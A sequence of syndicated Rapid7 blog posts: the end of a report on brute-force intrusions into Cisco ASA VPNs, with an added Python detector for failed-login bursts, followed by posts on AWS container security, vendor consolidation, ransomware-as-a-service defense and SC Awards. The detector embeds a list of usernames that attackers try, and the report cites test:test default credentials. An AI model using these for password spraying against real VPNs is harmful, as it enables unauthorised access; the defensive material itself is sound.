In parallel with incident response investigations into ASA-based intrusions, Rapid7 threat intelligence teams have been monitoring underground forums and Telegram channels for threat actor discussion about these types of attacks. In February 2023, a well-known initial access broker called “Bassterlord” was observed in XSS forums selling a guide on breaking into corporate networks. The guide, which included chapters on SSL VPN brute forcing, was being sold for $10,000 USD.

When several other forums started leaking information from the guide, Bassterlord posted on Twitter about shifting to a content rental model rather than selling the guide wholesale:

[Image: Bassterlord’s Twitter post announcing the shift to a content rental model]

Rapid7 obtained a leaked copy of the manual and analyzed its content. Notably, the author claimed they had compromised 4,865 Cisco SSL VPN services and 9,870 Fortinet VPN services with the username/password combination test:test. It’s possible that, given the timing of the dark web discussion and the increased threat activity we observed, the manual’s instructions contributed to the uptick in brute force attacks targeting Cisco ASA VPNs.


Indicators of compromise

Rapid7 identified the following IP addresses associated with source authentication events to compromised internal assets, as well as outbound connections from AnyDesk:

Other IP addresses that were observed conducting brute force attempts:

Many of the IP addresses above were hosted by the following providers:

  • Chang Way Technologies Co. Limited
  • Flyservers S.A.
  • Xhost Internet Solutions Lp
  • NFOrce Entertainment B.V.
  • VDSina Hosting

Log-based indicators:

  • Login attempts with invalid username and password combinations (%ASA-6-113015)
  • RAVPN session creation (attempts) for unexpected profiles/TGs (%ASA-4-113019, %ASA-4-722041, %ASA-7-734003)

Mitigation guidance

As Rapid7’s mid-year threat review noted, nearly 40% of all incidents our managed services teams responded to in the first half of 2023 stemmed from a lack of MFA on VPN or virtual desktop infrastructure. These incidents reinforce that the use of weak or default credentials remains common, and that credentials in general are often not protected as a result of lax MFA enforcement in corporate networks.

To mitigate the risk of the attacker behavior outlined in this blog, organizations should:

  • Ensure default accounts have been disabled or passwords have been reset from the default.
  • Ensure MFA is enforced across all VPN users, limiting exceptions to this policy as much as possible.
  • Enable logging on VPNs: Cisco has information on doing this for ASA specifically here, along with guidance on collecting forensic evidence from ASA devices here.
  • Monitor VPN logs for authentication attempts occurring outside expected locations of employees.
  • Monitor VPN logs for failed authentications, looking for brute forcing and password spraying patterns.
  • As a best practice, keep current on patches for security issues in VPNs, virtual desktop infrastructure, and other gateway devices.
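As an added example (not part of the Rapid7 post or its detection rules), the following Python script applies the log-based indicators and the monitoring guidance above to a constructed batch of ASA syslog lines: it parses %ASA-6-113015 rejections, groups them by source IP, and flags the sub-second bursts and the wordlist usernames described earlier in the post. The timestamp prefix and the exact 113015 message layout are assumptions modeled on ASA syslog output, and the addresses are RFC 5737 documentation ranges, not the IOCs from this post.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Usernames the post reports being tried against ASA appliances in these intrusions.
COMMON_BRUTE_FORCE_USERNAMES = frozenset({
    "admin", "adminadmin", "backupadmin", "kali", "cisco", "guest",
    "accounting", "developer", "ftp user", "training", "test", "printer",
    "echo", "security", "inspector", "test test", "snmp",
})

# Assumed line layout (an assumption for this example, modeled on ASA syslog):
# ISO-8601 timestamp with milliseconds, then the %ASA-6-113015 rejection message.
FAILED_LOGIN_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}\.\d{3}) "
    r"%ASA-6-113015: AAA user authentication Rejected\s*:.*?"
    r"user = (?P<user>.+?)\s*: user IP = (?P<ip>\S+)$"
)


def parse_failed_logins(lines):
    """Return (timestamp, username, source_ip) for each 113015 line; other messages are skipped."""
    events = []
    for line in lines:
        m = FAILED_LOGIN_RE.match(line.strip())
        if m:
            events.append((datetime.fromisoformat(m["ts"]),
                           m["user"].strip().lower(), m["ip"]))
    return events


def analyze(lines, window=timedelta(seconds=1), burst_threshold=5):
    """Per source IP: attempt count, distinct usernames, wordlist hits, and whether
    `burst_threshold` rejections landed inside one `window` (the millisecond-spaced
    failures the post describes)."""
    by_ip = defaultdict(list)
    for ts, user, ip in parse_failed_logins(lines):
        by_ip[ip].append((ts, user))

    report = {}
    for ip, evs in by_ip.items():
        evs.sort()
        burst, left = False, 0
        for right in range(len(evs)):            # sliding window over sorted timestamps
            while evs[right][0] - evs[left][0] > window:
                left += 1
            if right - left + 1 >= burst_threshold:
                burst = True
                break
        users = {u for _, u in evs}
        report[ip] = {
            "attempts": len(evs),
            "distinct_users": len(users),         # many users, few tries each = spraying
            "wordlist_hits": sorted(users & COMMON_BRUTE_FORCE_USERNAMES),
            "burst": burst,
        }
    return report


def suspicious_sources(report, min_wordlist_hits=3):
    """Source IPs worth escalating: a burst, or repeated use of the wordlist usernames."""
    return sorted(ip for ip, r in report.items()
                  if r["burst"] or len(r["wordlist_hits"]) >= min_wordlist_hits)


# Constructed sample log: six rejections from one address within ~50 ms, one unrelated
# connection message, and a single typo-style failure from a second address.
SAMPLE_LOG = """\
2023-08-29T10:15:01.120 %ASA-6-113015: AAA user authentication Rejected : reason = Invalid password : local database : user = admin : user IP = 203.0.113.5
2023-08-29T10:15:01.131 %ASA-6-113015: AAA user authentication Rejected : reason = Invalid password : local database : user = cisco : user IP = 203.0.113.5
2023-08-29T10:15:01.139 %ASA-6-113015: AAA user authentication Rejected : reason = Invalid password : local database : user = test : user IP = 203.0.113.5
2023-08-29T10:15:01.147 %ASA-6-113015: AAA user authentication Rejected : reason = Invalid password : local database : user = guest : user IP = 203.0.113.5
2023-08-29T10:15:01.158 %ASA-6-113015: AAA user authentication Rejected : reason = Invalid password : local database : user = kali : user IP = 203.0.113.5
2023-08-29T10:15:01.166 %ASA-6-113015: AAA user authentication Rejected : reason = Invalid password : local database : user = printer : user IP = 203.0.113.5
2023-08-29T10:15:02.010 %ASA-6-302013: Built inbound TCP connection 12345 for outside:203.0.113.5/51122 (203.0.113.5/51122) to identity:10.0.0.1/443 (10.0.0.1/443)
2023-08-29T10:16:44.501 %ASA-6-113015: AAA user authentication Rejected : reason = Invalid password : local database : user = jsmith : user IP = 198.51.100.7
"""

if __name__ == "__main__":
    report = analyze(SAMPLE_LOG.splitlines())
    for ip in suspicious_sources(report):
        print(ip, report[ip])
```

Lowering `window` or raising `burst_threshold` tunes the burst rule; the wordlist rule catches slow sprays that never trip the timing check.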

Rapid7 is monitoring MDR customers for anomalous authentication events and signs of brute forcing and password spraying. For InsightIDR and MDR customers, the following non-exhaustive list of detection rules is deployed and alerting on activity related to the attack patterns in this blog:

  • Ingress Auth by Local ASA Account
  • Attacker Technique – NTDS File Access
  • Attacker Tool – Impacket Lateral Movement
  • Process Spawned By SoftPerfect Network Scanner
  • Execution From Root of ProgramData

Various sources have recently published pieces noting that ransomware groups appear to be targeting Cisco VPNs to gain access to corporate networks. Rapid7 strongly recommends reviewing the IOCs and related information in this blog and in Cisco’s PSIRT blog and taking action to strengthen security posture for VPN implementations.

Why Your AWS Cloud Container Needs Client-Side Security

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/08/24/why-your-aws-cloud-container-needs-client-side-security/

Why Your AWS Cloud Container Needs Client-Side Security

With increasingly complicated network infrastructure and organizations needing to deploy applications across various environments, cloud containers are necessary for companies to stay agile and innovative. Containers are packages of software that hold all of the necessary components for an app to run in any environment. One of the biggest benefits of cloud containers? They virtualize an operating system, enabling access from private data centers, public clouds, and even laptops.

According to recent research by Faction, 92% of organizations have a multi-cloud strategy in place or are in the process of adopting one. In addition to the ubiquity of cloud computing, there are a variety of cloud container providers, including Google Cloud Platform (GCP), Amazon Web Services (AWS), and Microsoft Azure. Nearly 80% of all containers on the cloud, however, run on AWS, which is known for its security, reliability, and scalability.

When it comes to cloud container security, AWS works on a shared responsibility model. This means that security and compliance are shared between AWS and the client. AWS protects the infrastructure running the services offered in the cloud — the hardware, software, networking, and facilities.

Unfortunately, many AWS users stop here. They believe that the security provided by AWS is sufficient to protect their cloud containers. While it is true that the level of customer responsibility for security differs depending on the AWS product, each product does require the customer to assume some level of security responsibility.

To avoid this mistake, let’s examine why your AWS cloud container needs additional client-side security and how Rapid7 can help.

Top reasons why your AWS container needs client-side security

Visibility and monitoring

Some of the same qualities that make containers ideal for agility and innovation also create difficulty in visibility and monitoring. Cloud containers are ephemeral, which means they’re easy to establish and destroy. This is convenient for quickly moving workloads and applications, but it also makes it difficult to track changes. Many AWS containers share memory and CPU resources with a variety of hosts (physical and cloud) in your ecosystem. Consequently, monitoring resource consumption and assessing container performance and application health can be difficult — after all, how can you know how much memory is being utilized by the container versus the physical host?

Traditional monitoring tools and solutions also fail to collect the necessary metrics or provide the crucial insights needed for monitoring and troubleshooting container health and performance. While AWS offers protection for the cloud container structure, visualizing and monitoring what happens within the container is the responsibility of your organization.

Alert contextualization and remediation

As your company grows and you scale your cloud infrastructure, your DevOps teams will continue to create containers. For example, Google runs everything in containers and launches an enormous number of them (several billion per week!) to keep up with developer and client needs. While you might not be launching quite as many containers, it’s still easy to lose track of them all. Organizations utilize alerts to keep track of container performance and health to resolve problems quickly. While alerting policies differ, most companies use metric- or log-based alerting.

It can be overwhelming to manage and remediate all of your organization’s container alerts. Not only do these alerts need to be routed to the proper developer or resource owner, but they also need to be remediated quickly to ensure the security and continued good performance of the container.

Cybersecurity standards

While AWS provides security for your foundational services in containerized applications — computing, storage, databases, and networking — it’s your responsibility to develop sufficient security protocols to protect your data, applications, operating system, and firewall. In the same way that your organization follows external cybersecurity standards for security and compliance across the rest of your digital ecosystem, it’s best to align your client-side AWS container security with a well-known industry framework.

Adopting a standardized cybersecurity framework will work in concert with AWS’s security measures by providing guidelines and best practices — preventing your organization from a haphazard security application that creates coverage gaps.

How Rapid7 can help with AWS container security

Now that you know why your organization needs client-side security, here’s how Rapid7 can help.

  • Visibility and monitoring: Rapid7’s InsightCloudSec continuously scans your cloud’s infrastructure, orchestration platforms, and workloads to provide a real-time assessment of health, performance, and risk. With the ability to scan containers in less than 60 seconds, your team will be able to quickly and accurately track changes in your containers and view the data in a single, convenient platform, perfect for collaborating across teams and quickly remediating issues.
  • Alert contextualization and remediation: Client-side security measures are key to processing and remediating system alerts in your AWS containers, but this can’t be accomplished manually. Automation is key for alert contextualization and remediation. InsightCloudSec integrates with AWS services like Amazon GuardDuty to analyze logs for malicious activity. The tool also integrates with your larger enterprise security systems to automate the remediation of critical risks in real time — often within 60 seconds.
  • Cybersecurity standards: While aligning your cloud containers with an industry-standard cybersecurity framework is a necessity, it’s often a struggle. Maintaining security and compliance requirements requires specialized knowledge and expertise. With record staff shortages, this often falls by the wayside. InsightCloudSec automates cloud compliance for well-known industry standards like the National Institute of Standards and Technology’s (NIST) Cybersecurity Framework (CSF) with out-of-the-box policies that map back to specific NIST directives.

Secure your container (and its contents)

AWS’s shared responsibility model of security helps relieve operational burdens for organizations operating cloud containers. AWS clients don’t have to worry about the infrastructure security of their cloud containers. The contents in the cloud containers, however, are the owner’s responsibility and require additional security considerations.

Client-side security is necessary for proper monitoring and visibility, reduction in alert fatigue and real-time troubleshooting, and the application of external cybersecurity frameworks. The right tools, like Rapid7’s InsightCloudSec, can provide crucial support in each of these areas and beyond, filling crucial expertise and staffing gaps on your team and empowering your organization to confidently (and securely) utilize cloud containers.

Want to learn more about AWS container security? Download Fortify Your Containerized Apps With Rapid7 on AWS.

Three Security Vendor Consolidation Myths Debunked

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/08/23/3-security-vendor-consolidation-myths/

Three Security Vendor Consolidation Myths Debunked

When it comes to security vendor consolidation, Gartner found that 57% of organizations are working with fewer than ten security vendors, utilizing consolidation to cut costs and improve their overall security posture.

But what about the other 43%?

While security vendor consolidation has many advantages — like improved security and operational efficiency as well as cost reduction and improved ROI — it’s clear that some myths about consolidation persist. Let’s take a deeper look at three of the most common consolidation myths:

  • The supremacy of “best of breed” security solutions
  • Lack of flexibility or vendor lock-in
  • Increased risk of vendor compromise

Myth #1: The supremacy of “best of breed” security solutions

One of the biggest myths of security vendor consolidation is that after consolidating, organizations will lose access to the superior “best of breed” security approach. “Best of breed” refers to purchasing the best product of each type for your infrastructure’s security needs. This could look like using one vendor for firewall protection, another for observability, a third for remediation, and so on.

While it is true that a “best of breed” approach seems to allow organizations to piece together a tech stack of all the best possible products, that’s not the whole story. Organizations with “best of breed” solutions often end up with technology bloat, or a larger tech stack that requires far more maintenance than single-platform or more streamlined offerings. Additionally, there’s more data created from using tools from multiple vendors, which can actually increase an organization’s attack surface and overall risk level.

Some “best of breed” environments are plagued by interoperability issues — the tools fail to communicate with each other and exchange information properly. This can result in a poorer overall security performance characterized by false alarms and a higher mean time to resolve (MTTR).

Myth #2: Consolidation kills flexibility and creates vendor lock-in

Many security teams believe that consolidation locks you into working with a single or smaller number of vendors who may prove to be unreliable or offer subpar services. In reality, you can easily address concerns of vendor performance and flexibility by carefully researching potential vendors before selecting a solution. During the vetting process, ask potential vendors questions around on- and offboarding, security, maintenance, subscription, and licensing fees.

It’s also important to remember that many vendors offer flexibility within their consolidation packages, which means that you often will be able to build a portfolio of products to meet your needs as opposed to being locked into a specific package.

Finally, working with fewer vendors allows you to develop stronger relationships with fewer vendor representatives, resulting in more comprehensive customer service and support.

Myth #3: Increased risk from vendor compromise

Many organizations fear that after consolidating, if one of their vendors is compromised, it presents a serious security risk. This is easily avoidable, however, if organizations practice consolidation across functions and not layers.

In general, secure organizations have layers of security, or redundancies in place to catch and remediate vulnerabilities quickly. This approach, also known as “defense in depth,” may look like a security solution to monitor your endpoints and a separate tool to manage threats in your ecosystem.

You don’t want to consolidate within these layers. For example, let’s imagine that you have the same security provider for both your endpoint monitoring and threat management. If the vendor is compromised and unable to provide protection, your infrastructure would be without endpoint management and threat management at the same time, which presents a serious security risk.

Consequently, you’ll want to consolidate across functions. It may be helpful to picture your security needs within a layer. For example, if you’re looking for greater endpoint protection — monitoring, visibility, and remediation — you can look for consolidation solutions in this area. Consolidating across functions can actually strengthen your security posture. Working from a single platform can improve data sharing across tools, efficiency, and remediation processes, creating a stronger layer of security. Then, if a vendor is compromised, you’ll still have active protection from vendors in your other layers.

Consolidation just makes sense

Hesitation around security vendor consolidation is understandable. It’s important not to rush and choose the wrong vendor or platform, which can ultimately put your organization at risk. However, widespread consolidation myths may be holding you back from reaping the financial, operational, and security benefits of consolidation.

Lowering costs is a big one. Organizations with a variety of security vendors are paying for each service, and often, multiple licenses. Consolidation offers a chance to cut costs of multiple subscription and licensing fees, as well as reap the benefits of competitively priced consolidation packages.

Consolidation also boosts operational efficiency. Organizations with too many security vendors struggle with visibility, false alarms, and gaps in their infrastructure’s coverage. The interoperability that consolidation offers can eliminate false alarms and boost visibility, while working with security vendors to build a customized consolidated security package that fits your organization’s needs.

When it comes to consolidation, breaking down the major misconceptions can lead to a stronger, more cohesive security solution equipped to handle the rapidly changing threat landscape.

Want to learn more about consolidation and where to get started? Check out our eBook, “The Case for Security Vendor Consolidation.”

Ransomware-as-a-Service cheat sheet

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/08/22/ransomware-as-a-service-cheat-sheet/

Ransomware-as-a-Service cheat sheet

Ransomware-as-a-Service, or RaaS, has taken the threat landscape by storm — so much so that in 2023, the White House re-classified ransomware as a national security threat. How has RaaS taken the impact of ransomware attacks to this next level of federal concern? By allowing potential cybercriminals to launch a ransomware attack regardless of their experience with programming or technical sophistication.

According to Cybersecurity Ventures, ransomware might cost companies nearly $265 billion annually by the end of 2031. Meanwhile, bad actors get a lot of bang for their buck with Ransomware-as-a-Service. RaaS kit subscriptions can be as little as $40 per month.

That said, security professionals shouldn’t roll over or wave the white flag. Implementing a few key strategies can minimize the effect and decrease the likelihood of falling victim to a RaaS attack.

What is RaaS?

Organizations should clearly understand what RaaS is to make their security strategies specific to the needs of ransomware defense.

So, what is Ransomware-as-a-Service? It’s a business model designed by larger, more sophisticated ransomware groups. These groups utilize their technical expertise to create portable ransomware packages — or kits — that they then sell to buyers aiming to launch their own ransomware attacks.

Basically, ransomware operators turn their processes into a program or software usable by other threat actors. RaaS packages are often advertised on forums on the dark web, and they can also come with downloadable features, bundled offers, and 24/7 support staff. Well-known examples of groups that produce RaaS kits include:

RaaS kits aren’t developed out of the goodness of ransomware groups’ hearts. As noted above, these kits operate similarly to SaaS business models in that users follow some type of payment plan with the original ransomware operators.

These plans might look like:

  • A one-time licensing fee
  • A monthly subscription fee
  • An affiliate program fee — which typically entitles a chunk of the profits to the ransomware group
  • Pure profit sharing

Defending against RaaS attacks

When it comes to Ransomware-as-a-Service, the best method of defense follows a pretty consistent cybersecurity theme: Prevention is protection. Ransomware attacks are extremely costly and time-consuming for security teams to retroactively address. So, implementing security strategies aimed at stopping RaaS users in their tracks should be considered essential.

However, RaaS attacks are evolving faster than ever, so it can be tough for security teams to know where to start. Here’s a cheat sheet of three easy ways to defend your organization from RaaS attacks — well before they even strike.

1. Patch, patch, and patch again

Patching is a critical part of cybersecurity maintenance. Ransomware operators are looking out for new vulnerabilities to exploit around the clock — after all, that’s their full-time job. So, it’s critical for organizations to amp up their vulnerability management strategy and stay on top of the growing list of Common Vulnerabilities and Exposures (CVE) entries that bad actors use to breach sensitive systems and assets. A rigorous patching program will go a long way in keeping the latest RaaS kits at bay.

RaaS Hack: Keep tabs on what vulnerabilities your organization might have by checking up on CISA’s Known Exploited Vulnerabilities Catalog. This federal resource includes a bulletin that security teams can subscribe to, as well as downloadable versions in CSV and JSON formats.

2. Segment networks to prevent widespread environment proliferation

One of the biggest problems with RaaS attacks is that they move fast. Once RaaS users find an “in,” they can swiftly move into other connected environments — which can lead to an organization getting completely infested by ransomware.

To prevent the RaaS ripple effect, organizations should segment their networks. Network segmentation compartmentalizes one larger network into sub-networks, which allows security teams to devise security controls unique to each smaller network. Sub-networks not only make network security more manageable, they also make network security more diverse — mitigating the damage of one exploited vulnerability.

3. Build and maintain a culture of security

An organization is only as strong as its weakest link — and more often than not, humans are the weakest link. IBM’s 2023 X-Force Threat Intelligence Index found that successful phishing campaigns caused 41% of all security incidents. That means a critical remedy for RaaS attacks is providing organization-wide education on phishing, business email compromise, and other attack methods that rely on human error.

RaaS Hack: If your organization has limited resources for cybersecurity, leveraging managed services can implement cybersecurity “training wheels.” Managed services vendors can help educate your teams — and by proxy, your whole organization — on best practices for protection against RaaS attacks.

Next steps for RaaS defense

RaaS attacks are growing more frequent and more sophisticated, and it can be tough to match and meet bad actors where they’re at when you are inundated with a laundry list of other daily tasks.

That’s why we built Managed Threat Complete, an always-on MDR with vulnerability management in a single subscription that helps take the load off your security teams so they have space to innovate and strategize. Leverage the skill of our world-class cybersecurity experts and learn how to implement robust RaaS defense in your organization today.

Rapid7 Takes 2023 SC Awards for Vulnerability Management and Threat Detection

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/08/22/rapid7-takes-2023-sc-awards-for-vulnerability-management-and-threat-detection/

Rapid7 Takes 2023 SC Awards for Vulnerability Management and Threat Detection

The highly respected SC Awards program, hosted by SC Media, recognizes the solutions, organizations, and people driving innovation and success in information security. Now in its 26th year, the SC Awards continue to grow and evolve.

Rapid7 is proud to announce we have received not one, but two prestigious SC Awards this year! InsightVM is the 2023 SC Award recipient for Best Vulnerability Management Solution and InsightIDR received the award in the brand new Best Threat Detection Technology category.

This year, SC’s panel of independent industry leaders, from sectors including healthcare, financial services, manufacturing, consulting, and education sorted through a record number of entries. Additionally, SC added several new award categories and several modified categories to the competition.

Why InsightVM was selected

InsightVM is a vulnerability management tool that provides visibility into an organization’s security program, enabling security teams to reduce attack surface and security risk. The tool helps manage and mature vulnerability management programs by identifying vulnerabilities, prioritizing remediation efforts, and tracking progress against key metrics.

SC Media says InsightVM was selected for its ability to support the entire vulnerability management lifecycle and to enable security teams to manage their program more effectively. SC also noted the solution’s integration with Project Sonar for external-facing asset and threat exposure monitoring, as well as its robust tagging system to prioritize critical assets for remediation. Finally, they noted that live dashboards, Remediation Projects, and Goals and SLAs ease collaboration with stakeholders.

InsightVM was designed to provide a shared view and common language needed to collaborate with traditionally siloed teams and drive impactful remediation. As a result, easy collaboration stands out to customers as well.

“We’ve got at least five different teams that have responsibility for their own systems,” said Nick Defoe, Director of Information Security, US Signal. “Using the dashboard interface, we’ve been able to build out the reporting for each individual team. Getting these disparate groups all into one platform where they can see what they need to do for vulnerability management has been critical to our success.”

Why InsightIDR was selected

InsightIDR, Rapid7’s cloud-native XDR and next-gen SIEM, offers unified and transformed security data to detect real attacks and provide high-context insights to stop threats early in the attack chain.

According to SC Media, InsightIDR was selected because it empowers teams to deliver sophisticated detection and response outcomes with greater efficiency and efficacy, wherever they are in their security journey. This tracks with customers, as well.

In a recent TechValidate survey, 92% of Rapid7 customers reported that InsightIDR creates efficiency and scale, and it offers savings that make it an accessible and robust solution for diverse industries and teams.

“When I put Rapid7 in place my response time went from three to four hours to ten to fifteen minutes,” said Kerry LeBlanc, IT Security Engineer, Bioventus. “I see what it is and how to remediate it. Everything is right there. I can query the endpoint or get information and pull up different things on the user.”

SC also noted InsightIDR’s “complete visibility, coverage, superior signal-to-noise, and smarter responses.” InsightIDR provides this complete visibility and coverage with a native endpoint agent, network sensors, collectors and APIs. Lightweight, software-based collection technology and integrations go beyond unifying data to correlate, attribute, and enrich diverse datasets into a single, harmonious picture — unlocking efficiency to give teams time back, ensure that they find real threats faster, and that they can respond quickly and completely.

Rapid7 offers free trials of both InsightVM and InsightIDR.